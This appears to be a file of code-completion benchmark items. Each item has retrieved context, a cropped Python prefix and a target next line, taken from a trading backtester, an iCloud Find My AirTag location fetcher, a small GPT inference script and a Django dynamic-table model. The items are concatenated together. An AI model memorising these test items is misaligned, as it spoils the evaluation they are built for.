"snippet": "class FillEvent(Event):\n \"\"\"\n Fill event once an order based on the response from the broker\n\n Parameters:\n datetime - A datetime at which the signal is created.\n symbol - The symbol for current asset.\n exchange - The exchange, broker where the order is filled\n quantity - quantity filled\n direction\n fill_cost - can contain commission already\n commission - Defaulted to None if non specified\n \"\"\"\n\n def __init__(\n self,\n datetime,\n symbol,\n exchange,\n quantity,\n direction,\n fill_cost,\n commission=None,\n ):\n self.type = \"FILL\"\n self.datetime = datetime\n self.symbol = symbol\n self.exchange = exchange\n self.quantity = quantity\n self.direction = direction\n self.fill_cost = fill_cost\n\n # Calculate commission\n if commission is None:\n self.commission = self._calculate_commission()\n else:\n self.commission = commission\n\n def _calculate_commission(self):\n \"\"\"\n TODO: Commission fees to be implemented\n \"\"\"\n # between 1 and 2%\n return max(1.5, 0.015 * self.quantity)"
},
{
"identifier": "CSVGenerator",
"path": "backtester/generator/csvgenerator.py",
"snippet": "class CSVGenerator(Generator):\n def __init__(self, symbol_list):\n self.csv_dir = Path.cwd() / \"data\"\n self.symbol_list = symbol_list\n\n self.symbol_data = {}\n self.latest_symbol_data = {}\n self.continue_backtest = True\n self._load()\n\n def register(self, events):\n self.events = events\n\n def _load(self):\n combined_index = None\n for symbol in self.symbol_list:\n self.symbol_data[symbol] = pd.io.parsers.read_csv(\n os.path.join(self.csv_dir, \"%s.csv\" % symbol),\n header=0,\n index_col=0,\n names=[\n \"datetime\",\n \"open\",\n \"high\",\n \"low\",\n \"close\",\n \"adj_close\",\n \"volume\",\n ],\n )\n\n # Combine the index to pad forward values\n if combined_index is None:\n combined_index = self.symbol_data[symbol].index\n else:\n combined_index.union(self.symbol_data[symbol].index)\n\n # Set the latest symbol_data to None\n self.latest_symbol_data[symbol] = []\n\n # Reindex the dataframes\n for symbol in self.symbol_list:\n self.symbol_data[symbol] = (\n self.symbol_data[symbol]\n .reindex(index=combined_index, method=\"pad\")\n .iterrows()\n )\n\n def _get_new_bar(self, symbol):\n for bar in self.symbol_data[symbol]:\n yield bar\n\n def get_latest_bar(self, symbol):\n try:\n bars_list = self.latest_symbol_data[symbol]\n except KeyError:\n print(\"That symbol is not available in the historical data set.\")\n raise\n else:\n return bars_list[-1]\n\n def get_latest_bars(self, symbol, N=1):\n try:\n bars_list = self.latest_symbol_data[symbol]\n except KeyError:\n print(\"That symbol is not available in the historical data set.\")\n raise\n else:\n return bars_list[-N:]\n\n def get_latest_bar_datetime(self, symbol):\n try:\n bars_list = self.latest_symbol_data[symbol]\n except KeyError:\n print(\"That symbol is not available in the historical data set.\")\n raise\n else:\n return bars_list[-1][0]\n\n def get_latest_bar_value(self, symbol, value_type):\n try:\n bars_list = self.latest_symbol_data[symbol]\n except KeyError:\n print(\"That symbol is not available in the historical data set.\")\n raise\n else:\n return getattr(bars_list[-1][1], value_type)\n\n def get_latest_bars_values(self, symbol, value_type, N=1):\n try:\n bars_list = self.get_latest_bars(symbol, N)\n except KeyError:\n print(\"That symbol is not available in the historical data set.\")\n raise\n else:\n return np.array([getattr(bar[1], value_type) for bar in bars_list])\n\n def update_bars(self):\n for symbol in self.symbol_list:\n try:\n bar = next(self._get_new_bar(symbol))\n except StopIteration:\n self.continue_backtest = False\n else:\n if bar is not None:\n self.latest_symbol_data[symbol].append(bar)\n self.events.put(MarketEvent())"
}
] | import pprint
import queue
import time
from .events import MarketEvent, SignalEvent, OrderEvent, FillEvent
from .generator import CSVGenerator | 1,965 |
class Loop:
def __init__(
self,
data_handler,
execution_handler,
portfolio,
strategy,
heartbeat,
):
self.heartbeat = heartbeat
self.data_handler = data_handler
self.execution_handler = execution_handler
self.portfolio = portfolio
self.strategy = strategy
self.events = queue.Queue()
self.signals = 0
self.orders = 0
self.fills = 0
self.num_strats = 1
self._set_datahandler()
self._set_portfolio()
self._set_execution_handler()
self._set_strategy()
def _set_datahandler(self):
if isinstance(self.data_handler, CSVGenerator):
self.data_handler.register(self.events)
else:
raise NotImplementedError("Data feed not implemented")
def _set_strategy(self):
self.strategy.register(self.data_handler, self.events)
def _set_portfolio(self):
self.portfolio.register(self.data_handler, self.events)
def _set_execution_handler(self):
self.execution_handler.register(self.events)
def _run_backtest(self):
"""
Executes the backtest.
"""
while True:
if self.data_handler.continue_backtest:
self.data_handler.update_bars()
else:
break
while True:
try:
event = self.events.get(False)
except queue.Empty:
break
else:
if event is not None:
|
class Loop:
def __init__(
self,
data_handler,
execution_handler,
portfolio,
strategy,
heartbeat,
):
self.heartbeat = heartbeat
self.data_handler = data_handler
self.execution_handler = execution_handler
self.portfolio = portfolio
self.strategy = strategy
self.events = queue.Queue()
self.signals = 0
self.orders = 0
self.fills = 0
self.num_strats = 1
self._set_datahandler()
self._set_portfolio()
self._set_execution_handler()
self._set_strategy()
def _set_datahandler(self):
if isinstance(self.data_handler, CSVGenerator):
self.data_handler.register(self.events)
else:
raise NotImplementedError("Data feed not implemented")
def _set_strategy(self):
self.strategy.register(self.data_handler, self.events)
def _set_portfolio(self):
self.portfolio.register(self.data_handler, self.events)
def _set_execution_handler(self):
self.execution_handler.register(self.events)
def _run_backtest(self):
"""
Executes the backtest.
"""
while True:
if self.data_handler.continue_backtest:
self.data_handler.update_bars()
else:
break
while True:
try:
event = self.events.get(False)
except queue.Empty:
break
else:
if event is not None: | if isinstance(event, MarketEvent): | 0 | 2023-12-16 21:09:00+00:00 | 4k |
liebrandapps/FindMyGUI | findmy/request_reports.py | [
{
"identifier": "icloud_login_mobileme",
"path": "findmy/pypush_gsa_icloud.py",
"snippet": "def icloud_login_mobileme(ctx, second_factor='sms'):\n username = ctx.cfg.appleId_appleId\n password = ctx.cfg.appleId_password\n anisetteUrl = ctx.cfg.general_anisetteHost + \":\" + str(ctx.cfg.general_anisettePort)\n if not username or not password:\n now = datetime.now()\n ctx.signInDone = False\n ctx.requestCreds = int(now.timestamp())\n ctx.log.info(\"[ICLOUD] Waiting for password (90 seconds from now on)\")\n interval = 30\n while interval > 0:\n time.sleep(3.0)\n if len(ctx.userName) > 0 and len(ctx.password) > 0:\n username = ctx.userName\n password = ctx.password\n interval = 0\n continue\n if not username or not password:\n ctx.log.error(\"[ICLOUD] No User/Password received, stopping\")\n return None\n else:\n ctx.log.info(f\"[ICLOUD] Received User {username} / Password\")\n\n g = gsa_authenticate(username, password, ctx, second_factor=second_factor)\n pet = g[\"t\"][\"com.apple.gs.idms.pet\"][\"token\"]\n adsid = g[\"adsid\"]\n\n data = {\n \"apple-id\": username,\n \"delegates\": {\"com.apple.mobileme\": {}},\n \"password\": pet,\n \"client-id\": str(USER_ID),\n }\n data = plist.dumps(data)\n\n headers = {\n \"X-Apple-ADSID\": adsid,\n \"User-Agent\": \"com.apple.iCloudHelper/282 CFNetwork/1408.0.4 Darwin/22.5.0\",\n \"X-Mme-Client-Info\": '<MacBookPro18,3> <Mac OS X;13.4.1;22F8> <com.apple.AOSKit/282 (com.apple.accountsd/113)>'\n }\n headers.update(generate_anisette_headers(anisetteUrl))\n\n r = requests.post(\n \"https://setup.icloud.com/setup/iosbuddy/loginDelegates\",\n auth=(username, pet),\n data=data,\n headers=headers,\n verify=False,\n )\n\n return plist.loads(r.content)"
},
{
"identifier": "generate_anisette_headers",
"path": "findmy/pypush_gsa_icloud.py",
"snippet": "def generate_anisette_headers(anisetteUrl):\n try:\n import pyprovision\n from ctypes import c_ulonglong\n import secrets\n adi = pyprovision.ADI(\"./anisette/\")\n adi.provisioning_path = \"./anisette/\"\n device = pyprovision.Device(\"./anisette/device.json\")\n if not device.initialized:\n # Pretend to be a MacBook Pro\n device.server_friendly_description = \"<MacBookPro13,2> <macOS;13.1;22C65> <com.apple.AuthKit/1 (com.apple.dt.Xcode/3594.4.19)>\"\n device.unique_device_identifier = str(uuid.uuid4()).upper()\n device.adi_identifier = secrets.token_hex(8).lower()\n device.local_user_uuid = secrets.token_hex(32).upper()\n adi.identifier = device.adi_identifier\n dsid = c_ulonglong(-2).value\n is_prov = adi.is_machine_provisioned(dsid)\n if not is_prov:\n print(\"provisioning...\")\n provisioning_session = pyprovision.ProvisioningSession(adi, device)\n provisioning_session.provision(dsid)\n otp = adi.request_otp(dsid)\n a = {\"X-Apple-I-MD\": base64.b64encode(bytes(otp.one_time_password)).decode(),\n \"X-Apple-I-MD-M\": base64.b64encode(bytes(otp.machine_identifier)).decode()}\n except ImportError:\n print(f'pyprovision is not installed, querying {anisetteUrl} for an anisette server')\n h = json.loads(requests.get(anisetteUrl, timeout=5).text)\n a = {\"X-Apple-I-MD\": h[\"X-Apple-I-MD\"], \"X-Apple-I-MD-M\": h[\"X-Apple-I-MD-M\"]}\n a.update(generate_meta_headers(user_id=USER_ID, device_id=DEVICE_ID))\n return a"
}
] | import base64
import datetime
import hashlib
import json
import os
import struct
import requests
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from findmy.pypush_gsa_icloud import icloud_login_mobileme, generate_anisette_headers | 1,703 |
class FindMy:
def __init__(self, ctx):
self.ctx = ctx
def sha256(self, data):
digest = hashlib.new("sha256")
digest.update(data)
return digest.digest()
def decrypt(self, enc_data, algorithm_dkey, mode):
decryptor = Cipher(algorithm_dkey, mode, default_backend()).decryptor()
return decryptor.update(enc_data) + decryptor.finalize()
def decode_tag(self, data):
latitude = struct.unpack(">i", data[0:4])[0] / 10000000.0
longitude = struct.unpack(">i", data[4:8])[0] / 10000000.0
confidence = int.from_bytes(data[8:9], 'big')
status = int.from_bytes(data[9:10], 'big')
return {'lat': latitude, 'lon': longitude, 'conf': confidence, 'status': status}
def getAuth(self, regenerate=False, second_factor='sms'):
CONFIG_PATH = os.path.dirname(os.path.realpath(__file__)) + "/auth.json"
if os.path.exists(CONFIG_PATH) and not regenerate:
with open(CONFIG_PATH, "r") as f:
j = json.load(f)
else:
mobileme = None
try:
mobileme = icloud_login_mobileme(self.ctx, second_factor=second_factor)
except requests.exceptions.ConnectionError as e:
msg = f"[ICLOUD] Anisette Server not running: {str(e)}"
self.ctx.errMsg = msg
self.ctx.log.error(msg)
if mobileme is None:
return None
j = {'dsid': mobileme['dsid'],
'searchPartyToken': mobileme['delegates']['com.apple.mobileme']['service-data']['tokens'][
'searchPartyToken']}
with open(CONFIG_PATH, "w") as f:
json.dump(j, f)
return (j['dsid'], j['searchPartyToken'])
def retrieveLocations(self):
privkeys = {}
names = {}
for tag in self.ctx.airtags.values():
hashedKey = tag.hashedAdvKey
privkeys[hashedKey] = tag.privateKey
names[hashedKey] = tag.name
unixEpoch = int(datetime.datetime.now().strftime('%s'))
startdate = unixEpoch - (60 * 60 * 24)
data = {"search": [{"startDate": startdate * 1000, "endDate": unixEpoch * 1000, "ids": list(names.keys())}]}
auth = self.getAuth(regenerate=False,
second_factor='trusted_device' if self.ctx.cfg.general_trustedDevice else 'sms')
if auth is None:
return
r = requests.post("https://gateway.icloud.com/acsnservice/fetch",
auth=auth,
|
class FindMy:
def __init__(self, ctx):
self.ctx = ctx
def sha256(self, data):
digest = hashlib.new("sha256")
digest.update(data)
return digest.digest()
def decrypt(self, enc_data, algorithm_dkey, mode):
decryptor = Cipher(algorithm_dkey, mode, default_backend()).decryptor()
return decryptor.update(enc_data) + decryptor.finalize()
def decode_tag(self, data):
latitude = struct.unpack(">i", data[0:4])[0] / 10000000.0
longitude = struct.unpack(">i", data[4:8])[0] / 10000000.0
confidence = int.from_bytes(data[8:9], 'big')
status = int.from_bytes(data[9:10], 'big')
return {'lat': latitude, 'lon': longitude, 'conf': confidence, 'status': status}
def getAuth(self, regenerate=False, second_factor='sms'):
CONFIG_PATH = os.path.dirname(os.path.realpath(__file__)) + "/auth.json"
if os.path.exists(CONFIG_PATH) and not regenerate:
with open(CONFIG_PATH, "r") as f:
j = json.load(f)
else:
mobileme = None
try:
mobileme = icloud_login_mobileme(self.ctx, second_factor=second_factor)
except requests.exceptions.ConnectionError as e:
msg = f"[ICLOUD] Anisette Server not running: {str(e)}"
self.ctx.errMsg = msg
self.ctx.log.error(msg)
if mobileme is None:
return None
j = {'dsid': mobileme['dsid'],
'searchPartyToken': mobileme['delegates']['com.apple.mobileme']['service-data']['tokens'][
'searchPartyToken']}
with open(CONFIG_PATH, "w") as f:
json.dump(j, f)
return (j['dsid'], j['searchPartyToken'])
def retrieveLocations(self):
privkeys = {}
names = {}
for tag in self.ctx.airtags.values():
hashedKey = tag.hashedAdvKey
privkeys[hashedKey] = tag.privateKey
names[hashedKey] = tag.name
unixEpoch = int(datetime.datetime.now().strftime('%s'))
startdate = unixEpoch - (60 * 60 * 24)
data = {"search": [{"startDate": startdate * 1000, "endDate": unixEpoch * 1000, "ids": list(names.keys())}]}
auth = self.getAuth(regenerate=False,
second_factor='trusted_device' if self.ctx.cfg.general_trustedDevice else 'sms')
if auth is None:
return
r = requests.post("https://gateway.icloud.com/acsnservice/fetch",
auth=auth, | headers=generate_anisette_headers(self.ctx.cfg.general_anisetteHost+":"+str(self.ctx.cfg.general_anisettePort)), | 1 | 2023-12-16 12:39:52+00:00 | 4k |
aliosmankaya/shakespeare-gpt | inference.py | [
{
"identifier": "decode",
"path": "data.py",
"snippet": "def get_batch(split):"
},
{
"identifier": "GPT",
"path": "network.py",
"snippet": "class GPT(nn.Module):\n def __init__(self, config):\n super().__init__()\n assert config.vocab_size is not None\n assert config.block_size is not None\n self.config = config\n\n self.transformer = nn.ModuleDict(\n dict(\n wte=nn.Embedding(config.vocab_size, config.n_embd),\n wpe=nn.Embedding(config.block_size, config.n_embd),\n drop=nn.Dropout(config.dropout),\n h=nn.ModuleList([Block(config) for _ in range(config.n_layer)]),\n ln_f=LayerNorm(config.n_embd, bias=config.bias),\n )\n )\n self.lm_head = nn.Linear(config.n_embd, config.vocab_size, bias=False)\n # with weight tying when using torch.compile() some warnings get generated:\n # \"UserWarning: functional_call was passed multiple values for tied weights.\n # This behavior is deprecated and will be an error in future versions\"\n # not 100% sure what this is, so far seems to be harmless. TODO investigate\n self.transformer.wte.weight = (\n self.lm_head.weight\n ) # https://paperswithcode.com/method/weight-tying\n\n # init all weights\n self.apply(self._init_weights)\n # apply special scaled init to the residual projections, per GPT-2 paper\n for pn, p in self.named_parameters():\n if pn.endswith(\"c_proj.weight\"):\n torch.nn.init.normal_(\n p, mean=0.0, std=0.02 / math.sqrt(2 * config.n_layer)\n )\n\n # report number of parameters\n print(\"number of parameters: %.2fM\" % (self.get_num_params() / 1e6,))\n\n def get_num_params(self, non_embedding=True):\n \"\"\"\n Return the number of parameters in the model.\n For non-embedding count (default), the position embeddings get subtracted.\n The token embeddings would too, except due to the parameter sharing these\n params are actually used as weights in the final layer, so we include them.\n \"\"\"\n n_params = sum(p.numel() for p in self.parameters())\n if non_embedding:\n n_params -= self.transformer.wpe.weight.numel()\n return n_params\n\n def _init_weights(self, module):\n if isinstance(module, nn.Linear):\n torch.nn.init.normal_(module.weight, mean=0.0, std=0.02)\n if module.bias is not None:\n torch.nn.init.zeros_(module.bias)\n elif isinstance(module, nn.Embedding):\n torch.nn.init.normal_(module.weight, mean=0.0, std=0.02)\n\n def forward(self, idx, targets=None):\n device = idx.device\n b, t = idx.size()\n assert (\n t <= self.config.block_size\n ), f\"Cannot forward sequence of length {t}, block size is only {self.config.block_size}\"\n pos = torch.arange(0, t, dtype=torch.long, device=device) # shape (t)\n\n # forward the GPT model itself\n tok_emb = self.transformer.wte(idx) # token embeddings of shape (b, t, n_embd)\n pos_emb = self.transformer.wpe(pos) # position embeddings of shape (t, n_embd)\n x = self.transformer.drop(tok_emb + pos_emb)\n for block in self.transformer.h:\n x = block(x)\n x = self.transformer.ln_f(x)\n\n if targets is not None:\n # if we are given some desired targets also calculate the loss\n logits = self.lm_head(x)\n loss = F.cross_entropy(\n logits.view(-1, logits.size(-1)), targets.view(-1), ignore_index=-1\n )\n else:\n # inference-time mini-optimization: only forward the lm_head on the very last position\n logits = self.lm_head(\n x[:, [-1], :]\n ) # note: using list [-1] to preserve the time dim\n loss = None\n\n return logits, loss\n\n def crop_block_size(self, block_size):\n # model surgery to decrease the block size if necessary\n # e.g. we may load the GPT2 pretrained model checkpoint (block size 1024)\n # but want to use a smaller block size for some smaller, simpler model\n assert block_size <= self.config.block_size\n self.config.block_size = block_size\n self.transformer.wpe.weight = nn.Parameter(\n self.transformer.wpe.weight[:block_size]\n )\n for block in self.transformer.h:\n if hasattr(block.attn, \"bias\"):\n block.attn.bias = block.attn.bias[:, :, :block_size, :block_size]\n\n def configure_optimizers(self, weight_decay, learning_rate, betas, device):\n # start with all of the candidate parameters\n param_dict = {pn: p for pn, p in self.named_parameters()}\n # filter out those that do not require grad\n param_dict = {pn: p for pn, p in param_dict.items() if p.requires_grad}\n # create optim groups. Any parameters that is 2D will be weight decayed, otherwise no.\n # i.e. all weight tensors in matmuls + embeddings decay, all biases and layernorms don't.\n decay_params = [p for n, p in param_dict.items() if p.dim() >= 2]\n nodecay_params = [p for n, p in param_dict.items() if p.dim() < 2]\n optim_groups = [\n {\"params\": decay_params, \"weight_decay\": weight_decay},\n {\"params\": nodecay_params, \"weight_decay\": 0.0},\n ]\n num_decay_params = sum(p.numel() for p in decay_params)\n num_nodecay_params = sum(p.numel() for p in nodecay_params)\n print(\n f\"num decayed parameter tensors: {len(decay_params)}, with {num_decay_params:,} parameters\"\n )\n print(\n f\"num non-decayed parameter tensors: {len(nodecay_params)}, with {num_nodecay_params:,} parameters\"\n )\n # Create AdamW optimizer and use the fused version if it is available\n fused_available = \"fused\" in inspect.signature(torch.optim.AdamW).parameters\n use_fused = fused_available and device == \"cuda\"\n extra_args = dict(fused=True) if use_fused else dict()\n optimizer = torch.optim.AdamW(\n optim_groups, lr=learning_rate, betas=betas, **extra_args\n )\n print(f\"using fused AdamW: {use_fused}\")\n\n return optimizer\n\n def estimate_mfu(self, fwdbwd_per_iter, dt):\n \"\"\"estimate model flops utilization (MFU) in units of A100 bfloat16 peak FLOPS\"\"\"\n # first estimate the number of flops we do per iteration.\n # see PaLM paper Appendix B as ref: https://arxiv.org/abs/2204.02311\n N = self.get_num_params()\n cfg = self.config\n L, H, Q, T = cfg.n_layer, cfg.n_head, cfg.n_embd // cfg.n_head, cfg.block_size\n flops_per_token = 6 * N + 12 * L * H * Q * T\n flops_per_fwdbwd = flops_per_token * T\n flops_per_iter = flops_per_fwdbwd * fwdbwd_per_iter\n # express our flops throughput as ratio of A100 bfloat16 peak flops\n flops_achieved = flops_per_iter * (1.0 / dt) # per second\n flops_promised = 312e12 # A100 GPU bfloat16 peak flops is 312 TFLOPS\n mfu = flops_achieved / flops_promised\n return mfu\n\n @torch.no_grad()\n def generate(self, idx, max_new_tokens, temperature=1.0, top_k=None):\n \"\"\"\n Take a conditioning sequence of indices idx (LongTensor of shape (b,t)) and complete\n the sequence max_new_tokens times, feeding the predictions back into the model each time.\n Most likely you'll want to make sure to be in model.eval() mode of operation for this.\n \"\"\"\n for _ in range(max_new_tokens):\n # if the sequence context is growing too long we must crop it at block_size\n idx_cond = (\n idx\n if idx.size(1) <= self.config.block_size\n else idx[:, -self.config.block_size :]\n )\n # forward the model to get the logits for the index in the sequence\n logits, _ = self(idx_cond)\n # pluck the logits at the final step and scale by desired temperature\n logits = logits[:, -1, :] / temperature\n # optionally crop the logits to only the top k options\n if top_k is not None:\n v, _ = torch.topk(logits, min(top_k, logits.size(-1)))\n logits[logits < v[:, [-1]]] = -float(\"Inf\")\n # apply softmax to convert logits to (normalized) probabilities\n probs = F.softmax(logits, dim=-1)\n # sample from the distribution\n idx_next = torch.multinomial(probs, num_samples=1)\n # append sampled index to the running sequence and continue\n idx = torch.cat((idx, idx_next), dim=1)\n\n return idx"
},
{
"identifier": "GPTConfig",
"path": "network.py",
"snippet": "class GPTConfig:\n block_size: int = 1024\n vocab_size: int = 50304 # GPT-2 vocab_size of 50257, padded up to nearest multiple of 64 for efficiency\n n_layer: int = 12\n n_head: int = 12\n n_embd: int = 768\n dropout: float = 0.0\n bias: bool = True # True: bias in Linears and LayerNorms, like GPT-2. False: a bit better and faster"
}
] | import torch
from data import decode, vocab_size
from network import GPT, GPTConfig
from parameters import * | 2,469 |
model_args = dict(
n_layer=n_layer,
n_head=n_head,
n_embd=n_embd,
block_size=block_size,
bias=bias,
vocab_size=vocab_size,
dropout=dropout,
)
|
model_args = dict(
n_layer=n_layer,
n_head=n_head,
n_embd=n_embd,
block_size=block_size,
bias=bias,
vocab_size=vocab_size,
dropout=dropout,
)
| gptconf = GPTConfig(**model_args) | 2 | 2023-12-17 17:54:31+00:00 | 4k |
Samuel-Effiong/Django-Dynamic-Table | django_dynamic_table/models.py | [
{
"identifier": "TableHaveNoRow",
"path": "django_dynamic_table/errors.py",
"snippet": "class TableHaveNoRow(DynamicTableError):\r\n pass\r"
},
{
"identifier": "TableHaveNoColumn",
"path": "django_dynamic_table/errors.py",
"snippet": "class TableHaveNoColumn(DynamicTableError):\r\n pass\r"
},
{
"identifier": "ColumnNotInTable",
"path": "django_dynamic_table/errors.py",
"snippet": "class ColumnNotInTable(DynamicTableError):\r\n pass\r"
},
{
"identifier": "RowNotInTable",
"path": "django_dynamic_table/errors.py",
"snippet": "class RowNotInTable(DynamicTableError):\r\n pass\r"
},
{
"identifier": "DuplicateColumnInTable",
"path": "django_dynamic_table/errors.py",
"snippet": "class DuplicateColumnInTable(DynamicTableError):\r\n pass\r"
},
{
"identifier": "DynamicTableError",
"path": "django_dynamic_table/errors.py",
"snippet": "class DynamicTableError(Exception):\r\n pass\r"
},
{
"identifier": "UnSupportedDataType",
"path": "django_dynamic_table/errors.py",
"snippet": "class UnSupportedDataType(TableColumnError):\r\n pass\r"
},
{
"identifier": "CantParseValueToDataType",
"path": "django_dynamic_table/errors.py",
"snippet": "class CantParseValueToDataType(CellValueError):\r\n pass\r"
},
{
"identifier": "CellDoesNotExist",
"path": "django_dynamic_table/errors.py",
"snippet": "class CellDoesNotExist(CellValueError):\r\n pass"
}
] | from typing import Sequence
from datetime import datetime
from django.db import models
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from .errors import (
TableHaveNoRow, TableHaveNoColumn, ColumnNotInTable,
RowNotInTable, DuplicateColumnInTable, DynamicTableError,
UnSupportedDataType, CantParseValueToDataType, CellDoesNotExist
)
| 2,436 | if not isinstance(row_index, (int, type(None))):
raise TypeError("Row index value must be an integer")
try:
if row_index is None:
row = self.table_rows.last()
else:
row = self.table_rows.get(pk=row_index)
except TableRow.DoesNotExist:
raise RowNotInTable()
else:
# remove row from the table
self.table_rows.remove(row)
# delete the removed row and all the cells associated with it
row.delete()
return row
def get_cell(self, column_name, row_index):
if isinstance(row_index, str):
row_index = int(row_index)
if not self.is_column(column_name):
raise ColumnNotInTable()
try:
cell = CellValue.objects.get(
table=self,
table_column__column_name=column_name,
table_row_id=row_index
)
return cell
except CellValue.DoesNotExist:
raise CellDoesNotExist
def get_column_cells(self, column_name):
if not self.is_column(column_name):
raise ColumnNotInTable()
column = TableColumn.objects.get(table=self, column_name=column_name)
column_cells = column.column_cells.all()
return list(column_cells)
def get_row_cells(self, row_index):
if isinstance(row_index, str):
row_index = int(row_index)
try:
row = TableRow.objects.get(table=self, id=row_index)
row_cells = row.row_cells.all()
except TableRow.DoesNotExist:
raise RowNotInTable()
return list(row_cells)
class TableColumn(models.Model):
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
column_name = models.CharField(max_length=255, unique=True)
column_data_type = models.CharField(max_length=15, choices=__SUPPORTED_DATA_TYPE_CHOICES__)
column_cells = models.ManyToManyField('CellValue', blank=True)
def __str__(self):
return f"{self.column_name}: {self.column_data_type} -- {self.table}"
def _get_column_values(self):
return self.column_cells.all()
class TableRow(models.Model):
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
row_cells = models.ManyToManyField('CellValue', blank=True)
def __str__(self):
return f"{self.table} Table: Row no. {self.id}"
def to_dict(self):
values = {
item.column.column_name: item.value
for item in self.row_cells.all()
}
return values
class CellValue(models.Model):
"""Synonymous with the cell in a spreadsheet, it contains the value of the
table along with relevant information about it position in the table"""
value = models.TextField(blank=True)
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
table_column = models.ForeignKey(TableColumn, on_delete=models.CASCADE)
table_row = models.ForeignKey(TableRow, blank=True, on_delete=models.CASCADE)
def __str__(self):
return self.value
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
self.full_clean()
super(CellValue, self).save()
def clean(self):
super(CellValue, self).clean()
self.__validate_data_type__(self.value, self.table_column.column_data_type)
def __validate_data_type__(self, value, data_type):
"""
Ensures that the values is saved in the database in the format that
can be easily be converted to the desired data type
"""
if data_type == 'char' or data_type == 'textfield':
self.value = str(value)
elif data_type == 'int':
if not isinstance(value, int):
try:
if value:
self.value = int(float(value))
else:
self.value = ""
except ValueError:
| """
Creating a Dynamic Table using conventional Django standard
This Table gives you more control over it manipulation than Django models
Developed by: Samuel Effiong Nkopuruk
Email: [email protected]
"""
__SUPPORTED_DATA_TYPE_CHOICES__ = (
('char', 'Char'),
('int', 'Int'),
('float', 'Float'),
('bool', 'Bool'),
('textfield', 'TextField'),
('date', 'Date'),
)
# Create your models here.
class DynamicTable(models.Model):
table_name = models.CharField(_('Table Name'), max_length=255, unique=True)
table_description = models.TextField(_('Table Description'), blank=True)
date_created = models.DateTimeField(_('Date Created'), default=timezone.now)
table_columns = models.ManyToManyField('TableColumn', blank=True)
table_rows = models.ManyToManyField('TableRow', blank=True)
class Meta:
ordering = ('-date_created', )
def __str__(self) -> str:
return f"{self.table_name}"
def __total_table_rows(self) -> int:
field = self.table_columns.first()
if field and isinstance(field, TableColumn):
return self.table_columns.all().count()
else:
# the table is empty
return 0
def __total_table_columns(self) -> int:
return self.table_columns.all().count()
def table_info(self) -> dict[str, int]:
description = {
'rows': self.__total_table_rows(),
'columns': self.__total_table_columns()
}
return description
def is_empty(self) -> bool:
table_info = self.table_info()
rows = table_info['rows']
columns = table_info['columns']
return True if columns == 0 or rows == 0 else False
def is_column(self, column_name: str) -> bool:
if not isinstance(column_name, str):
raise ValueError("column name must be a str")
try:
column = self.table_columns.get(column_name=column_name)
return True
except TableColumn.DoesNotExist:
return False
def get_supported_data_types(self) -> list[str]:
return [data_type[0] for data_type in __SUPPORTED_DATA_TYPE_CHOICES__]
def data_type_is_supported(self, data_type: str | list) -> bool | list[bool]:
supported_data_types = self.get_supported_data_types()
if isinstance(data_type, str):
return data_type.lower().strip() in supported_data_types
elif isinstance(data_type, (list, tuple, set)):
return [_type.lower().strip() in supported_data_types for _type in data_type]
else:
raise ValueError('arg must be either a str or a sequence')
def add_column(self, column_name: str, data_type: str):
if isinstance(column_name, str) and isinstance(data_type, str):
if not self.data_type_is_supported(data_type):
raise UnSupportedDataType()
if self.is_column(column_name):
raise DuplicateColumnInTable()
table_column = TableColumn(
table=self,
column_name=column_name,
column_data_type=data_type
)
table_column.save()
self.table_columns.add(table_column)
return table_column
else:
raise DynamicTableError("argument must be str, use self.bulk_add_columns to add multiple columns")
def bulk_add_columns(self, column_names: Sequence[str], data_types: Sequence[str]):
allowed_argument_type = (list, tuple, set)
if isinstance(column_names, allowed_argument_type) and isinstance(data_types, allowed_argument_type):
if len(column_names) != len(data_types):
raise DynamicTableError(f"len({column_names}) = {len(column_names)} != len({data_types}) = {len(data_types)}")
else:
# check if list of data_types contains any unsupported data type
supported_data_type = self.data_type_is_supported(data_types)
if False in supported_data_type:
raise UnSupportedDataType(f"{data_types} data type that are supported are: {supported_data_type}")
else:
# check if the provided column names contain duplicates, raise an error if it does
unique_column_names = set(column_names)
if len(column_names) != len(unique_column_names):
raise DuplicateColumnInTable()
is_column = [self.is_column(column) for column in column_names]
if True in is_column:
raise DuplicateColumnInTable()
columns = [
TableColumn.objects.create(
table=self,
column_name=column_name,
column_data_type=data_type
)
for column_name, data_type in zip(column_names, data_types, strict=True)
# the above further exception should not be activated, but adding it there,
# if just in case, for some unknown reason it escape the other safeguard.
]
self.table_columns.add(*columns)
return columns
else:
raise DynamicTableError("argument must be a sequence. use self.add_column to add a single column")
def add_row(self, value: dict):
if not isinstance(value, dict):
raise ValueError(f"{value} is not a list or a dict")
if self.__total_table_columns() == 0:
raise TableHaveNoColumn()
row = []
table_row = TableRow.objects.create(table=self)
for table_column in self.table_columns.all():
cell_value = value.get(table_column.column_name, "")
cell = CellValue.objects.create(
value=cell_value, table=self,
table_column=table_column,
table_row=table_row
)
row.append(cell)
# add cell to column
table_column.column_cells.add(cell)
# add cell to row
table_row.row_cells.add(*row)
# add row to table
self.table_rows.add(table_row)
return table_row
def bulk_add_rows(self, values: Sequence[dict]) -> list:
if not isinstance(values, (list, tuple, set)):
raise ValueError('values must be a sequence of dict')
rows = []
for row in values:
if not isinstance(row, dict):
raise ValueError('values must be a sequence of dict')
if self.__total_table_columns() == 0:
raise TableHaveNoColumn()
rows.append(self.add_row(row))
return rows
def delete_column(self, column_name):
# using get instead of filter if for some reason the unique parameter
# was disabled in the table column definition, this will doubly ensure
# that the field are unique else it will always raise an error if it
# encounter duplicates column names
if not isinstance(column_name, str):
raise ValueError('column_name must be a str')
try:
column = self.table_columns.get(column_name=column_name)
except TableColumn.MultipleObjectsReturned:
raise DuplicateColumnInTable()
except TableColumn.DoesNotExist:
raise ColumnNotInTable()
else:
# remove column from the table
self.table_columns.remove(column)
# delete the removed column and all the cells associated with it
column.delete()
return column
def delete_row(self, row_index=None):
"""if row_index is None remove the last row"""
if not isinstance(row_index, (int, type(None))):
raise TypeError("Row index value must be an integer")
try:
if row_index is None:
row = self.table_rows.last()
else:
row = self.table_rows.get(pk=row_index)
except TableRow.DoesNotExist:
raise RowNotInTable()
else:
# remove row from the table
self.table_rows.remove(row)
